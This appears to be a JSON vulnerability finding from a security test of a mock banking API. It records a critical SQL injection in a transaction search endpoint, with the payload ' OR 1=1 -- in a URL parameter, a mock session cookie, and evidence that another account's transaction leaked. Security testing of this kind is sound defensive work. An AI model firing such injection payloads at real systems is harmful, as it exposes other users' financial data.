{
  "id": "VULN-002",
  "type": "SQLI",
  "endpoint": "/api/transactions/search",
  "http_method": "GET",
  "severity": "critical",
  "description": "Unsanitized query input in search endpoint allows SQL injection.",
  "reproduction": {
    "headers": {
      "Cookie": "session_token=mock_alice_session_123"
    },
    "payload": {},
    "url_params": {
      "q": "' OR 1=1 --"
    },
    "test_user": "Alice"
  },
  "evidence": {
    "status_code": 200,
    "response_body": "{\"transactions\": [{\"id\": 1, \"description\": \"Salary deposit\", \"to_account_id\": \"ACC-1001\"}, {\"id\": 3, \"description\": \"Dinner\", \"to_account_id\": \"ACC-1003\"}]}",
    "extracted_data": "Exfiltrated transaction 'Dinner' of account ACC-1003."
  },
  "timestamp": "2026-09-27T14:47:25.426786Z"
}